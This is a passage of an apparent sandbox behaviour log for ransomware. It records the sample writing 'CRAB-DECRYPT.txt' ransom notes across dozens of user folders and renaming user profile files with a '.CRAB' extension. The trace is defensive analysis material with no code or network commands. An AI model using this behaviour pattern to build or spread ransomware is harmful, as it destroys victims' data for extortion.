File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\356BZ594\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\N4CF7XJW\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\WIK9MYAA\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\ZE5P2FRT\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\MMC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\MS Project\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\MS Project\16\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\MS Project\16\en-US\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Network\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Network\Connections\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Network\Connections\Pbk\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Office\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\OneNote\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\OneNote\16.0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Outlook\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\PowerPoint\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Proof\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-2345716840-1148442690-1481144037-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Publisher\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Publisher Building Blocks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Speech\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Access Parts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Access Parts\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\UProof\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Word\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Word\STARTUP\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Extensions\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\minidumps\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\weave\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\weave\changes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\weave\failed\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\weave\toFetch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Skype\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Skype\RootTools\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Contacts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Cookies\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Desktop\3gmBUqZ\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\4pk5xz3if\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\4pk5xz3if\iVW0RGHlicG Hzx0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\AxPhQ0mF_FKp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\F-Ym27JZWwd_1ngVaiBV\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\My Shapes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\My Shapes\_private\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\OneNote Notebooks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\OneNote Notebooks\My Notebook\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\Outlook Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\tYADVae4csR\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\tYADVae4csR\KPmSm5_Jdwi-FZC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Downloads\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Favorites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Favorites\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Favorites\Microsoft Websites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Favorites\MSN Websites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Favorites\Windows Live\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\-hVupXG7m_Cs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\DnJAknvIy7yvnJQJZIo\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\DnJAknvIy7yvnJQJZIo\eJX7U\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\DnJAknvIy7yvnJQJZIo\eJX7U\JJPcUbiG7zKAw ZL1d7\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\DnJAknvIy7yvnJQJZIo\qfwMg0ir4m6Yey4\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\ftjIViaL6h\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\ftjIViaL6h\V4SwSPqo7BJ8A\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\My Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\NetHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\ntuser.dat.LOG1, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\ntuser.dat.LOG1, destination_filename = C:\Users\aETAdzjz\ntuser.dat.LOG1.CRAB False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf, destination_filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.CRAB False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms, destination_filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.CRAB False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms, destination_filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.CRAB False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\ntuser.ini, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\ntuser.ini, destination_filename = C:\Users\aETAdzjz\ntuser.ini.CRAB False 1
Fn
File Create filename = C:\Users\aETAdzjz\OneDrive\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\fScxNAsQ_v\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\fScxNAsQ_v\P1pR0SKdN-Cy8_\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\fScxNAsQ_v\P1pR0SKdN-Cy8_\1CK-5-PYY6hdpu\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\Q59pVM4DGorH9C\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\Q59pVM4DGorH9C\nPGhZBMpI\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\Q59pVM4DGorH9C\nPGhZBMpI\_5dyIJt\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\Q59pVM4DGorH9C\SkI-vCpKN\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\Q59pVM4DGorH9C\SkI-vCpKN\xbeZwnNGCfmWAoEC2\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\PrintHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Saved Games\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Searches\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\SendTo\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Start Menu\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Videos\CrcPLeAZTAb\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Videos\CrcPLeAZTAb\Jg-ab\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Videos\CrcPLeAZTAb\Jg-ab\3UXeHKbbXw-r\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Videos\CrcPLeAZTAb\Jg-ab\sh0KYzRkmp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Videos\CrcPLeAZTAb\kdvACwNk9kbryTA3pNb\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Videos\CrcPLeAZTAb\kdvACwNk9kbryTA3pNb\6qNC7PF6pw8CP\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Videos\CrcPLeAZTAb\kdvACwNk9kbryTA3pNb\6qNC7PF6pw8CP\u6Lb6668pv_ePK\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
